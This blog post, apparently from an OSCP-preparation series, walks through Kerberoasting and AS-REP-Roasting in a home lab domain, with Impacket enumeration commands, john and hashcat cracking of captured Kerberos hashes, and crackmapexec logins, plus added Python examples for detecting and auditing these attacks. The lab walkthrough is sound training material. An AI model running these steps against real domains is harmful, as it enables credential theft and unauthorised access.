
Sunday, September 19, 2021

Active Directory CORPORATIVE.domain.local Series[VIII] : Kerberoasting && AS-REP-Roasting attacks

Hi everyone!

So far so good. In this post I'm going to introduce you to another couple of famous Active Directory attacks: Kerberoasting and AS-REP-Roasting.

Both attacks are performed directly from the attacker side (a Kali Linux machine) against the Domain Controller of the CORPORATIVE.DOMAIN.local environment:


1. KERBEROASTING ATTACK


The Kerberoasting attack targets an existing account of the target domain that has an SPN configured and enabled.

For more information about SPN (Service Principal Name), you can read the following link:

https://docs.microsoft.com/es-es/archive/blogs/autz_auth_stuff/what-is-a-spn-and-why-should-you-care


1.1 Kerberoasting detection:


Using the GetUserSPNs.py tool from the attacker machine, with a domain user and valid credentials, we can list the users vulnerable to the Kerberoasting attack.




1.2 Prerequisite:

Configure a user vulnerable to the Kerberoasting attack on your domain controller:

- Create a new user for this kind of attack:



- Set an SPN on the target user:


1.3 Kerberoasting exploitation:


- Using the previous Impacket script it is possible to detect the new user with a Service Principal Name, which is going to be the target domain user for the exploitation:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                                     Name         MemberOf                                                                                       PasswordLastSet             LastLogon  Delegation 
-------------------------------------------------------  -----------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  ----------
CORPORATIVE.DOMAIN.local/SVC_service.CORPORATIVE-DOMAIN  SVC_service  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 14:19:22.218200  <never>               

- TGS Hash request:


- Perform an offline dictionary attack:

kali@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=KRB5TGS tgs_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Passw0rd1        (?)
1g 0:00:20:47 DONE (2021-09-19 15:24) 0.000801g/s 2502Kp/s 2502Kc/s 2502KC/s Passw0r0831..Passw0rd12312
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And finally validate the login for the new user:

kali@kali:~$ crackmapexec smb 10.0.2.1/24 -u"SVC_service" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\SVC_service:Passw0rd1 (Pwn3d!)
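
The whole procedure above leaves a trace on the Domain Controller: every service-ticket request is logged as Security event 4769, and the RC4 ticket that john reports as "etype 23 [MD4 HMAC-MD5 RC4]" shows up there as TicketEncryptionType 0x17 for a user (non-machine) SPN. The following is an added example of that check, written for this post and not code from the original entry or from Impacket; the 4769 records are constructed for the example, and the extra SPN names (SVC_sql), requester (alice) and IP addresses are invented.

```python
# Added example (not from the original post): flag Kerberoasting-style service-ticket
# requests in Windows Security event 4769 records.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC (etype 23) and RC4-HMAC-EXP (etype 24)

# Constructed 4769 records for this example; field names follow the Security log event.
SAMPLE_4769 = [
    {"TimeCreated": "2021-09-19 14:30:01", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_service", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.0.2.15", "Status": "0x0"},
    {"TimeCreated": "2021-09-19 14:30:02", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "CORPORATIVE-DOM$", "TicketEncryptionType": "0x12",   # machine account, AES
     "IpAddress": "::ffff:10.0.2.15", "Status": "0x0"},
    {"TimeCreated": "2021-09-19 14:31:10", "TargetUserName": "CORPORATIVE-DOM$@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",              # TGT renewal, not a SPN
     "IpAddress": "::1", "Status": "0x0"},
    {"TimeCreated": "2021-09-19 14:32:00", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_sql", "TicketEncryptionType": "0x17",             # hypothetical second SPN user
     "IpAddress": "::ffff:10.0.2.15", "Status": "0x0"},
    {"TimeCreated": "2021-09-19 14:40:00", "TargetUserName": "alice@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_service", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.0.2.30", "Status": "0x7"},                   # KDC_ERR_S_PRINCIPAL_UNKNOWN
]


def is_rc4_service_ticket(ev):
    """True when a TGS was successfully issued under RC4 for a user SPN (not a machine
    account, not the krbtgt TGT)."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"
            and ev["TicketEncryptionType"].lower() in RC4_ETYPES
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def kerberoast_alerts(events, window=timedelta(minutes=10), min_services=1):
    """Return {requesting user: sorted SPN service names} for every requester that obtained
    RC4 service tickets for at least `min_services` distinct user SPNs inside `window`.
    GetUserSPNs.py -request asks for all of them in one burst, so a larger `min_services`
    trades sensitivity for fewer false positives from legacy RC4 clients."""
    by_user = defaultdict(list)
    for ev in events:
        if is_rc4_service_ticket(ev):
            ts = datetime.strptime(ev["TimeCreated"], "%Y-%m-%d %H:%M:%S")
            by_user[ev["TargetUserName"]].append((ts, ev["ServiceName"]))

    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        best = set()
        # Sliding window: the largest set of distinct services requested within `window`.
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_services:
            alerts[user] = sorted(best)
    return alerts


if __name__ == "__main__":
    for user, services in kerberoast_alerts(SAMPLE_4769).items():
        print(f"RC4 service tickets requested by {user}: {', '.join(services)}")
```

Run stand-alone it reports worker2 requesting RC4 tickets for SVC_service and SVC_sql; the AES machine-account ticket, the krbtgt renewal and the failed request are ignored. On a domain where service accounts are gMSAs or AES-only (and RC4 is disabled for them), this alert becomes rare enough to act on, and the offline dictionary attack shown above is no longer feasible against a random 120-character gMSA password.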


2. AS-REP-ROASTING ATTACK

This attack is also executed directly against the Domain Controller. In order to perform it, the attacker looks for users with the "Do not require Kerberos preauthentication" property enabled, in order to get a Kerberos ticket for that account.


2.1 AS-REP-Roasting detection:

The AS-REP-Roasting attack targets an existing domain account that is vulnerable to this kind of attack because it has the NOT_PRE_AUTH ("Do not require Kerberos preauthentication") attribute enabled.


2.2 Prerequisite:

Configure a user vulnerable to the AS-REP-Roasting attack on your domain controller:

- Create a new user for this kind of attack:


2.3 AS-REP-Roasting exploitation:

- Looking for vulnerable users:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py  CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      
-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------
NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 

- Obtaining the Kerberos AS-REP hash for the account without pre-authentication:


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$[...]

- Performing an offline dictionary attack using hashcat:

sudo hashcat -m18200 '$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6' -a0 /usr/share/wordlists/rockyou.txt 

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$[...]:Passw0rd1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9a...6caed6



- And finally validate the login for the new user:

kali@kali:~$ crackmapexec smb 10.0.2.17 -u"NP_user" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\NP_user:Passw0rd1 (Pwn3d!)
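
The UAC column that GetNPUsers.py prints above (0x410200) is the raw userAccountControl value, and the bit that makes NP_user roastable is DONT_REQ_PREAUTH (0x400000). As an added defender-side example, written for this post and not code from the original entry or from Impacket, the snippet below decodes that value and audits a set of account records for the flag; the records are constructed for the example (worker2 and NP_user mirror the lab accounts, old_svc is hypothetical), and skipping disabled accounts is my own choice, not something the post states.

```python
# Added example (not from the original post): decode userAccountControl (UAC) and find the
# accounts that are AS-REP-roastable because Kerberos pre-authentication is not required.
from dataclasses import dataclass
from typing import List, Tuple

# Subset of userAccountControl bit flags, values as documented by Microsoft.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000

# LDAP filter using the bitwise-AND matching rule (4194304 == 0x400000); the same query
# works with ldapsearch or Get-ADUser -LDAPFilter to find these accounts in the directory.
ASREP_LDAP_FILTER = "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"


@dataclass
class Account:
    sam: str   # sAMAccountName
    uac: int   # userAccountControl


# Constructed directory records for this example.
SAMPLE_ACCOUNTS = [
    Account("NP_user", 0x410200),   # the value shown in the GetNPUsers.py UAC column above
    Account("worker2", 0x010200),   # normal account, password never expires
    Account("old_svc", 0x400202),   # hypothetical: pre-auth disabled, but the account is disabled too
]


def decode_uac(value: int) -> List[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def is_asrep_roastable(acct: Account) -> bool:
    """Enabled account for which the KDC answers an AS-REQ without pre-authentication."""
    return bool(acct.uac & DONT_REQ_PREAUTH) and not acct.uac & ACCOUNTDISABLE


def hardened_uac(value: int) -> int:
    """The UAC value after clearing DONT_REQ_PREAUTH, i.e. what
    Set-ADAccountControl -DoesNotRequirePreAuth $false writes back."""
    return value & ~DONT_REQ_PREAUTH


def audit(accounts) -> List[Tuple[str, List[str], int]]:
    """(sAMAccountName, decoded flags, corrected UAC) for every roastable account."""
    return [(a.sam, decode_uac(a.uac), hardened_uac(a.uac))
            for a in accounts if is_asrep_roastable(a)]


if __name__ == "__main__":
    for sam, flags, fixed in audit(SAMPLE_ACCOUNTS):
        print(f"{sam}: {' | '.join(flags)} -> set userAccountControl to {fixed:#x}")
```

For NP_user this decodes 0x410200 as NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH and proposes 0x10200 as the corrected value; on the DC side, each AS-REP handed out this way is also logged as Security event 4768 with Pre-Authentication Type 0, which is the signal to alert on while the flag is still set.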



And that's all for this couple of Active Directory attacks. I hope you enjoyed my eighth Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.
